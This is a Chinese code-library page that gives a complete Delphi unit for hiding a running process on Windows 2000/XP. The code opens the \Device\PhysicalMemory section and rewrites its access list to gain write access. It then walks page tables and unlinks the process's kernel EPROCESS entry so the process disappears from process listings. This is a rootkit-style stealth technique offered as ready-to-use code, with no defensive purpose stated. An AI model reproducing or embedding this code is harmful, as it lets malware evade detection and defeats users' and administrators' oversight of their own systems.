首页 > 代码库 > Delphi隐藏进程


interface    function MyHideProcess: Boolean;    implementation    uses  Windows,  Classes, AclAPI, accCtrl;    type  NTSTATUS = LongInt;    const  //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);  OBJ_INHERIT = $00000002;  OBJ_PERMANENT = $00000010;  OBJ_EXCLUSIVE = $00000020;  OBJ_CASE_INSENSITIVE = $00000040;  OBJ_OPENIF = $00000080;  OBJ_OPENLINK = $00000100;  OBJ_KERNEL_HANDLE = $00000200;  OBJ_VALID_ATTRIBUTES = $000003F2;    type  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;  IO_STATUS_BLOCK = record  Status: NTSTATUS;  FObject: DWORD;  end;    PUNICODE_STRING = ^UNICODE_STRING;  UNICODE_STRING = record  Length: Word;  MaximumLength: Word;  Buffer: PWideChar;  end;    POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;  OBJECT_ATTRIBUTES = record  Length: DWORD;  RootDirectory: Pointer;  ObjectName: PUNICODE_STRING;  Attributes: DWORD;  SecurityDescriptor: Pointer;  SecurityQualityOfService: Pointer;  end;    TZwOpenSection = function(SectionHandle: PHandle;  DesiredAccess: ACCESS_MASK;  ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;  SourceString: PWideChar); stdcall;    var  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;  ZwOpenSection: TZwOpenSection = nil;  g_hNtDLL: THandle = 0;  g_pMapPhysicalMemory: Pointer = nil;  g_hMPM: THandle = 0;  g_hMPM2: THandle = 0;  g_osvi: OSVERSIONINFO;  b_hide: Boolean = false;  //---------------------------------------------------------------------------    function InitNTDLL: Boolean;  begin  g_hNtDLL := LoadLibrary(‘ntdll.dll‘);    if 0 = g_hNtDLL then  begin  Result := false;  Exit;  end;    RtlInitUnicodeString := GetProcAddress(g_hNtDLL, ‘RtlInitUnicodeString‘);  ZwOpenSection := GetProcAddress(g_hNtDLL, ‘ZwOpenSection‘);    Result := True;  end;  //---------------------------------------------------------------------------    procedure CloseNTDLL;  begin  if (0 <> g_hNtDLL) then  FreeLibrary(g_hNtDLL);  g_hNtDLL := 0;  end;  //---------------------------------------------------------------------------    procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);  var  pDacl: PACL;  pSD: PPSECURITY_DESCRIPTOR;  pNewDacl: PACL;  dwRes: DWORD;  ea: EXPLICIT_ACCESS;  begin  pDacl := nil;  pSD := nil;  pNewDacl := nil;    dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);    if ERROR_SUCCESS <> dwRes then  begin  if Assigned(pSD) then  LocalFree(Hlocal(pSD^));  if Assigned(pNewDacl) then  LocalFree(HLocal(pNewDacl));  end;    ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));  ea.grfAccessPermissions := SECTION_MAP_WRITE;  ea.grfAccessMode := GRANT_ACCESS;  ea.grfInheritance := NO_INHERITANCE;  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;  ea.Trustee.ptstrName := ‘CURRENT_USER‘;    dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);    if ERROR_SUCCESS <> dwRes then  begin  if Assigned(pSD) then  LocalFree(Hlocal(pSD^));  if Assigned(pNewDacl) then  LocalFree(HLocal(pNewDacl));  end;    dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);    if ERROR_SUCCESS <> dwRes then  begin  if Assigned(pSD) then  LocalFree(Hlocal(pSD^));  if Assigned(pNewDacl) then  LocalFree(HLocal(pNewDacl));  end;    end;  //---------------------------------------------------------------------------    function OpenPhysicalMemory: THandle;  var  status: NTSTATUS;  physmemString: UNICODE_STRING;  attributes: OBJECT_ATTRIBUTES;  PhyDirectory: DWORD;  begin  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);  GetVersionEx(g_osvi);    if (5 <> g_osvi.dwMajorVersion) then  begin  Result := 0;  Exit;  end;    case g_osvi.dwMinorVersion of  0: PhyDirectory := $30000;  1: PhyDirectory := $39000;  else  begin  Result := 0;  Exit;  end;  end;    RtlInitUnicodeString(@physmemString, ‘\Device\PhysicalMemory‘);    attributes.Length := SizeOf(OBJECT_ATTRIBUTES);  attributes.RootDirectory := nil;  attributes.ObjectName := @physmemString;  attributes.Attributes := 0;  attributes.SecurityDescriptor := nil;  attributes.SecurityQualityOfService := nil;    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);    if (status = STATUS_ACCESS_DENIED) then  begin  ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);  SetPhyscialMemorySectionCanBeWrited(g_hMPM);  CloseHandle(g_hMPM);    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  end;    if not (LongInt(status) >= 0) then  begin  Result := 0;  Exit;  end;    g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,  FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);    if (g_pMapPhysicalMemory = nil) then  begin  Result := 0;  Exit;  end;    Result := g_hMPM;  end;  //---------------------------------------------------------------------------    function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;  var  VAddr, PGDE, PTE, PAddr, tmp: DWORD;  begin  VAddr := DWORD(addr);  // PGDE := BaseAddress[VAddr shr 22];  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.    if 0 = (PGDE and 1) then  begin  Result := nil;  Exit;  end;    tmp := PGDE and $00000080;    if (0 <> tmp) then  begin  PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);  end  else  begin  PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));  // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];  PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.    if (0 = (PTE and 1)) then  begin  Result := nil;  Exit;  end;    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);  UnmapViewOfFile(Pointer(PGDE));  end;    Result := Pointer(PAddr);  end;  //---------------------------------------------------------------------------    function GetData(addr: Pointer): DWORD;  var  phys, ret: DWORD;  tmp: PDWORD;  begin  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,  phys and $FFFFF000, $1000));    if (nil = tmp) then  begin  Result := 0;  Exit;  end;    // ret := tmp[(phys and $FFF) shr 2];  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.  UnmapViewOfFile(tmp);    Result := ret;  end;    function SetData(addr: Pointer; data: DWORD): Boolean;  var  phys: DWORD;  tmp: PDWORD;  begin  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));    if (nil = tmp) then  begin  Result := false;  Exit;  end;    // tmp[(phys and $FFF) shr 2] := data;  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.  UnmapViewOfFile(tmp);    Result := TRUE;  end;  //---------------------------------------------------------------------------  {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) begin ExitProcess(0); return 1 ; end }  //---------------------------------------------------------------------------    function YHideProcess: Boolean;  var  thread, process: DWORD;  fw, bw: DWORD;  begin  // SetUnhandledExceptionFilter(exeception);  if (FALSE = InitNTDLL) then  begin  Result := FALSE;  Exit;  end;    if (0 = OpenPhysicalMemory) then  begin  Result := FALSE;  Exit;  end;    thread := GetData(Pointer($FFDFF124)); //kteb  process := GetData(Pointer(thread + $44)); //kpeb    if (0 = g_osvi.dwMinorVersion) then  begin  fw := GetData(Pointer(process + $A0));  bw := GetData(Pointer(process + $A4));    SetData(Pointer(fw + 4), bw);  SetData(Pointer(bw), fw);    Result := TRUE;  end  else if (1 = g_osvi.dwMinorVersion) then  begin  fw := GetData(Pointer(process + $88));  bw := GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4), bw);  SetData(Pointer(bw), fw);    Result := TRUE;  end  else  begin  Result := False;  end;    CloseHandle(g_hMPM);  CloseNTDLL;  end;    function MyHideProcess: Boolean;  begin  if not b_hide then  begin  b_hide := YHideProcess;  end;    Result := b_hide;  end;    end.   

